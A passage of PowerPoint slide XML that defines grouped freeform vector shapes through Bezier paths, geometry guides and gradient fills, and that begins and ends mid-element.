                        <a:lnTo>
                          <a:pt x="0" y="5071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C0C0C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33" name="Group 851">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD8E269-C1FE-4EF1-A45C-2A57D2B9D14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160" y="1819"/>
                  <a:ext cx="110" cy="171"/>
                  <a:chOff x="2158" y="1204"/>
                  <a:chExt cx="419" cy="647"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1934" name="Freeform 852">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAC0953-917E-4412-B724-AFEE2E895F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294" y="1592"/>
                    <a:ext cx="177" cy="231"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 108"/>
                      <a:gd name="T1" fmla="*/ 36 h 140"/>
                      <a:gd name="T2" fmla="*/ 108 w 108"/>
                      <a:gd name="T3" fmla="*/ 35 h 140"/>
                      <a:gd name="T4" fmla="*/ 108 w 108"/>
                      <a:gd name="T5" fmla="*/ 28 h 140"/>
                      <a:gd name="T6" fmla="*/ 108 w 108"/>
                      <a:gd name="T7" fmla="*/ 23 h 140"/>
                      <a:gd name="T8" fmla="*/ 108 w 108"/>
                      <a:gd name="T9" fmla="*/ 22 h 140"/>
                      <a:gd name="T10" fmla="*/ 108 w 108"/>
                      <a:gd name="T11" fmla="*/ 17 h 140"/>
                      <a:gd name="T12" fmla="*/ 108 w 108"/>
                      <a:gd name="T13" fmla="*/ 16 h 140"/>
                      <a:gd name="T14" fmla="*/ 108 w 108"/>
                      <a:gd name="T15" fmla="*/ 16 h 140"/>
                      <a:gd name="T16" fmla="*/ 89 w 108"/>
                      <a:gd name="T17" fmla="*/ 7 h 140"/>
                      <a:gd name="T18" fmla="*/ 64 w 108"/>
                      <a:gd name="T19" fmla="*/ 2 h 140"/>
                      <a:gd name="T20" fmla="*/ 57 w 108"/>
                      <a:gd name="T21" fmla="*/ 4 h 140"/>
                      <a:gd name="T22" fmla="*/ 49 w 108"/>
                      <a:gd name="T23" fmla="*/ 6 h 140"/>
                      <a:gd name="T24" fmla="*/ 49 w 108"/>
                      <a:gd name="T25" fmla="*/ 6 h 140"/>
                      <a:gd name="T26" fmla="*/ 0 w 108"/>
                      <a:gd name="T27" fmla="*/ 18 h 140"/>
                      <a:gd name="T28" fmla="*/ 29 w 108"/>
                      <a:gd name="T29" fmla="*/ 47 h 140"/>
                      <a:gd name="T30" fmla="*/ 62 w 108"/>
                      <a:gd name="T31" fmla="*/ 40 h 140"/>
                      <a:gd name="T32" fmla="*/ 62 w 108"/>
                      <a:gd name="T33" fmla="*/ 118 h 140"/>
                      <a:gd name="T34" fmla="*/ 101 w 108"/>
                      <a:gd name="T35" fmla="*/ 129 h 140"/>
                      <a:gd name="T36" fmla="*/ 108 w 108"/>
                      <a:gd name="T37" fmla="*/ 117 h 140"/>
                      <a:gd name="T38" fmla="*/ 108 w 108"/>
                      <a:gd name="T39" fmla="*/ 36 h 1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08" h="140">
                        <a:moveTo>
                          <a:pt x="108" y="36"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="33"/>
                          <a:pt x="108" y="30"/>
                          <a:pt x="108" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="28"/>
                          <a:pt x="108" y="26"/>
                          <a:pt x="108" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="23"/>
                          <a:pt x="108" y="22"/>
                          <a:pt x="108" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="21"/>
                          <a:pt x="108" y="19"/>
                          <a:pt x="108" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="4"/>
                          <a:pt x="95" y="8"/>
                          <a:pt x="89" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="6"/>
                          <a:pt x="73" y="0"/>
                          <a:pt x="64" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="3"/>
                          <a:pt x="57" y="4"/>
                          <a:pt x="57" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="67"/>
                          <a:pt x="62" y="109"/>
                          <a:pt x="62" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="138"/>
                          <a:pt x="89" y="140"/>
                          <a:pt x="101" y="129"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="126"/>
                          <a:pt x="108" y="122"/>
                          <a:pt x="108" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="101"/>
                          <a:pt x="107" y="69"/>
                          <a:pt x="108" y="3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00"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="000000">
                          <a:gamma/>
                          <a:tint val="72549"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="000000"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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5" name="Freeform 853">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC380376-1AB6-4C4D-BE6B-5F3712C46C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225" y="1575"/>
                    <a:ext cx="326" cy="276"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 196 w 197"/>
                      <a:gd name="T1" fmla="*/ 44 h 167"/>
                      <a:gd name="T2" fmla="*/ 196 w 197"/>
                      <a:gd name="T3" fmla="*/ 37 h 167"/>
                      <a:gd name="T4" fmla="*/ 177 w 197"/>
                      <a:gd name="T5" fmla="*/ 18 h 167"/>
                      <a:gd name="T6" fmla="*/ 137 w 197"/>
                      <a:gd name="T7" fmla="*/ 25 h 167"/>
                      <a:gd name="T8" fmla="*/ 99 w 197"/>
                      <a:gd name="T9" fmla="*/ 35 h 167"/>
                      <a:gd name="T10" fmla="*/ 99 w 197"/>
                      <a:gd name="T11" fmla="*/ 52 h 167"/>
                      <a:gd name="T12" fmla="*/ 99 w 197"/>
                      <a:gd name="T13" fmla="*/ 35 h 167"/>
                      <a:gd name="T14" fmla="*/ 99 w 197"/>
                      <a:gd name="T15" fmla="*/ 35 h 167"/>
                      <a:gd name="T16" fmla="*/ 99 w 197"/>
                      <a:gd name="T17" fmla="*/ 2 h 167"/>
                      <a:gd name="T18" fmla="*/ 89 w 197"/>
                      <a:gd name="T19" fmla="*/ 14 h 167"/>
                      <a:gd name="T20" fmla="*/ 2 w 197"/>
                      <a:gd name="T21" fmla="*/ 8 h 167"/>
                      <a:gd name="T22" fmla="*/ 2 w 197"/>
                      <a:gd name="T23" fmla="*/ 10 h 167"/>
                      <a:gd name="T24" fmla="*/ 2 w 197"/>
                      <a:gd name="T25" fmla="*/ 31 h 167"/>
                      <a:gd name="T26" fmla="*/ 12 w 197"/>
                      <a:gd name="T27" fmla="*/ 67 h 167"/>
                      <a:gd name="T28" fmla="*/ 70 w 197"/>
                      <a:gd name="T29" fmla="*/ 83 h 167"/>
                      <a:gd name="T30" fmla="*/ 83 w 197"/>
                      <a:gd name="T31" fmla="*/ 82 h 167"/>
                      <a:gd name="T32" fmla="*/ 149 w 197"/>
                      <a:gd name="T33" fmla="*/ 65 h 167"/>
                      <a:gd name="T34" fmla="*/ 150 w 197"/>
                      <a:gd name="T35" fmla="*/ 137 h 167"/>
                      <a:gd name="T36" fmla="*/ 150 w 197"/>
                      <a:gd name="T37" fmla="*/ 141 h 167"/>
                      <a:gd name="T38" fmla="*/ 197 w 197"/>
                      <a:gd name="T39" fmla="*/ 140 h 167"/>
                      <a:gd name="T40" fmla="*/ 196 w 197"/>
                      <a:gd name="T41" fmla="*/ 44 h 1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97" h="167">
                        <a:moveTo>
                          <a:pt x="196" y="44"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="44"/>
                          <a:pt x="196" y="40"/>
                          <a:pt x="196" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="23"/>
                          <a:pt x="183" y="19"/>
                          <a:pt x="177" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="168" y="17"/>
                          <a:pt x="137" y="25"/>
                          <a:pt x="137" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="20"/>
                          <a:pt x="99" y="4"/>
                          <a:pt x="99" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="98" y="8"/>
                          <a:pt x="95" y="13"/>
                          <a:pt x="89" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="16"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="55"/>
                          <a:pt x="0" y="64"/>
                          <a:pt x="12" y="67"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="69"/>
                          <a:pt x="66" y="82"/>
                          <a:pt x="70" y="83"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="83"/>
                          <a:pt x="78" y="84"/>
                          <a:pt x="83" y="82"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="97" y="78"/>
                          <a:pt x="127" y="71"/>
                          <a:pt x="149" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="138"/>
                          <a:pt x="150" y="140"/>
                          <a:pt x="150" y="141"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="167"/>
                          <a:pt x="196" y="163"/>
                          <a:pt x="197" y="140"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="125"/>
                          <a:pt x="196" y="60"/>
                          <a:pt x="196" y="44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00"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="000000">
                          <a:gamma/>
                          <a:tint val="72549"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="000000"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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6" name="Freeform 854">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42BF04E7-0004-4D81-953D-F0ED400391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158" y="1323"/>
                    <a:ext cx="419" cy="329"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 254"/>
                      <a:gd name="T1" fmla="*/ 119 h 200"/>
                      <a:gd name="T2" fmla="*/ 184 w 254"/>
                      <a:gd name="T3" fmla="*/ 127 h 200"/>
                      <a:gd name="T4" fmla="*/ 173 w 254"/>
                      <a:gd name="T5" fmla="*/ 55 h 200"/>
                      <a:gd name="T6" fmla="*/ 144 w 254"/>
                      <a:gd name="T7" fmla="*/ 27 h 200"/>
                      <a:gd name="T8" fmla="*/ 96 w 254"/>
                      <a:gd name="T9" fmla="*/ 14 h 200"/>
                      <a:gd name="T10" fmla="*/ 51 w 254"/>
                      <a:gd name="T11" fmla="*/ 2 h 200"/>
                      <a:gd name="T12" fmla="*/ 18 w 254"/>
                      <a:gd name="T13" fmla="*/ 13 h 200"/>
                      <a:gd name="T14" fmla="*/ 3 w 254"/>
                      <a:gd name="T15" fmla="*/ 96 h 200"/>
                      <a:gd name="T16" fmla="*/ 3 w 254"/>
                      <a:gd name="T17" fmla="*/ 96 h 200"/>
                      <a:gd name="T18" fmla="*/ 2 w 254"/>
                      <a:gd name="T19" fmla="*/ 99 h 200"/>
                      <a:gd name="T20" fmla="*/ 2 w 254"/>
                      <a:gd name="T21" fmla="*/ 99 h 200"/>
                      <a:gd name="T22" fmla="*/ 9 w 254"/>
                      <a:gd name="T23" fmla="*/ 118 h 200"/>
                      <a:gd name="T24" fmla="*/ 26 w 254"/>
                      <a:gd name="T25" fmla="*/ 119 h 200"/>
                      <a:gd name="T26" fmla="*/ 33 w 254"/>
                      <a:gd name="T27" fmla="*/ 117 h 200"/>
                      <a:gd name="T28" fmla="*/ 33 w 254"/>
                      <a:gd name="T29" fmla="*/ 117 h 200"/>
                      <a:gd name="T30" fmla="*/ 36 w 254"/>
                      <a:gd name="T31" fmla="*/ 116 h 200"/>
                      <a:gd name="T32" fmla="*/ 43 w 254"/>
                      <a:gd name="T33" fmla="*/ 114 h 200"/>
                      <a:gd name="T34" fmla="*/ 44 w 254"/>
                      <a:gd name="T35" fmla="*/ 76 h 200"/>
                      <a:gd name="T36" fmla="*/ 41 w 254"/>
                      <a:gd name="T37" fmla="*/ 77 h 200"/>
                      <a:gd name="T38" fmla="*/ 44 w 254"/>
                      <a:gd name="T39" fmla="*/ 53 h 200"/>
                      <a:gd name="T40" fmla="*/ 43 w 254"/>
                      <a:gd name="T41" fmla="*/ 171 h 200"/>
                      <a:gd name="T42" fmla="*/ 53 w 254"/>
                      <a:gd name="T43" fmla="*/ 183 h 200"/>
                      <a:gd name="T44" fmla="*/ 111 w 254"/>
                      <a:gd name="T45" fmla="*/ 199 h 200"/>
                      <a:gd name="T46" fmla="*/ 140 w 254"/>
                      <a:gd name="T47" fmla="*/ 177 h 200"/>
                      <a:gd name="T48" fmla="*/ 140 w 254"/>
                      <a:gd name="T49" fmla="*/ 171 h 200"/>
                      <a:gd name="T50" fmla="*/ 140 w 254"/>
                      <a:gd name="T51" fmla="*/ 139 h 200"/>
                      <a:gd name="T52" fmla="*/ 139 w 254"/>
                      <a:gd name="T53" fmla="*/ 98 h 200"/>
                      <a:gd name="T54" fmla="*/ 137 w 254"/>
                      <a:gd name="T55" fmla="*/ 84 h 200"/>
                      <a:gd name="T56" fmla="*/ 136 w 254"/>
                      <a:gd name="T57" fmla="*/ 79 h 200"/>
                      <a:gd name="T58" fmla="*/ 137 w 254"/>
                      <a:gd name="T59" fmla="*/ 84 h 200"/>
                      <a:gd name="T60" fmla="*/ 139 w 254"/>
                      <a:gd name="T61" fmla="*/ 98 h 200"/>
                      <a:gd name="T62" fmla="*/ 145 w 254"/>
                      <a:gd name="T63" fmla="*/ 136 h 200"/>
                      <a:gd name="T64" fmla="*/ 145 w 254"/>
                      <a:gd name="T65" fmla="*/ 137 h 200"/>
                      <a:gd name="T66" fmla="*/ 145 w 254"/>
                      <a:gd name="T67" fmla="*/ 137 h 200"/>
                      <a:gd name="T68" fmla="*/ 145 w 254"/>
                      <a:gd name="T69" fmla="*/ 142 h 200"/>
                      <a:gd name="T70" fmla="*/ 155 w 254"/>
                      <a:gd name="T71" fmla="*/ 165 h 200"/>
                      <a:gd name="T72" fmla="*/ 170 w 254"/>
                      <a:gd name="T73" fmla="*/ 171 h 200"/>
                      <a:gd name="T74" fmla="*/ 223 w 254"/>
                      <a:gd name="T75" fmla="*/ 155 h 200"/>
                      <a:gd name="T76" fmla="*/ 209 w 254"/>
                      <a:gd name="T77" fmla="*/ 119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254" h="200">
                        <a:moveTo>
                          <a:pt x="209" y="119"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="207" y="121"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="184" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="179" y="94"/>
                          <a:pt x="175" y="64"/>
                          <a:pt x="173" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="170" y="36"/>
                          <a:pt x="153" y="30"/>
                          <a:pt x="144" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="23"/>
                          <a:pt x="110" y="18"/>
                          <a:pt x="96" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="83" y="10"/>
                          <a:pt x="61" y="4"/>
                          <a:pt x="51" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="41" y="0"/>
                          <a:pt x="21" y="4"/>
                          <a:pt x="18" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="16"/>
                          <a:pt x="10" y="56"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="4" y="116"/>
                          <a:pt x="9" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="121"/>
                          <a:pt x="20" y="120"/>
                          <a:pt x="26" y="119"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="117"/>
                          <a:pt x="35" y="117"/>
                          <a:pt x="36" y="116"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="116"/>
                          <a:pt x="41" y="115"/>
                          <a:pt x="43" y="114"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="76"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="41" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="60"/>
                          <a:pt x="44" y="49"/>
                          <a:pt x="44" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="59"/>
                          <a:pt x="43" y="123"/>
                          <a:pt x="43" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="177"/>
                          <a:pt x="47" y="182"/>
                          <a:pt x="53" y="183"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="67" y="186"/>
                          <a:pt x="102" y="197"/>
                          <a:pt x="111" y="199"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="200"/>
                          <a:pt x="138" y="190"/>
                          <a:pt x="140" y="177"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="175"/>
                          <a:pt x="140" y="173"/>
                          <a:pt x="140" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="124"/>
                          <a:pt x="140" y="111"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="92"/>
                          <a:pt x="137" y="87"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="82"/>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="82"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="93"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="108"/>
                          <a:pt x="142" y="120"/>
                          <a:pt x="145" y="136"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="136"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="148" y="154"/>
                          <a:pt x="151" y="161"/>
                          <a:pt x="155" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="169"/>
                          <a:pt x="164" y="170"/>
                          <a:pt x="170" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="186" y="167"/>
                          <a:pt x="204" y="161"/>
                          <a:pt x="223" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="254" y="147"/>
                          <a:pt x="236" y="110"/>
                          <a:pt x="209" y="119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00"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="000000">
                          <a:gamma/>
                          <a:tint val="72549"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="000000"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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7" name="Freeform 855">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35CDD832-54D9-4128-9A07-5C9905C71C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2252" y="1304"/>
                    <a:ext cx="109" cy="69"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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8" name="Oval 856">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE48383-72EC-4A96-8E1D-2BA142D34C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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2239" y="1204"/>
                    <a:ext cx="145" cy="145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1717" name="Group 1154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C907DB4-B629-46B7-960D-E74EA11ED1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7326" y="2321316"/>
              <a:ext cx="833420" cy="795596"/>
              <a:chOff x="688" y="1065"/>
              <a:chExt cx="1939" cy="1850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1921" name="Freeform 1155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E673F187-5C60-4511-A852-844B986278F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88" y="1065"/>
                <a:ext cx="1939" cy="1850"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4041"/>
                  <a:gd name="T1" fmla="*/ 1084 h 3855"/>
                  <a:gd name="T2" fmla="*/ 0 w 4041"/>
                  <a:gd name="T3" fmla="*/ 3855 h 3855"/>
                  <a:gd name="T4" fmla="*/ 4041 w 4041"/>
                  <a:gd name="T5" fmla="*/ 2770 h 3855"/>
                  <a:gd name="T6" fmla="*/ 4041 w 4041"/>
                  <a:gd name="T7" fmla="*/ 0 h 3855"/>
                  <a:gd name="T8" fmla="*/ 0 w 4041"/>
                  <a:gd name="T9" fmla="*/ 1084 h 38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41" h="3855">
                    <a:moveTo>
                      <a:pt x="0" y="1084"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="3855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4041" y="2770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4041" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1084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969696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922" name="Group 1156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A06BC254-BFEF-4845-B18D-E7A01BE501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47" y="1722"/>
                <a:ext cx="434" cy="962"/>
                <a:chOff x="1547" y="1722"/>
                <a:chExt cx="434" cy="962"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1923" name="Freeform 1157">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
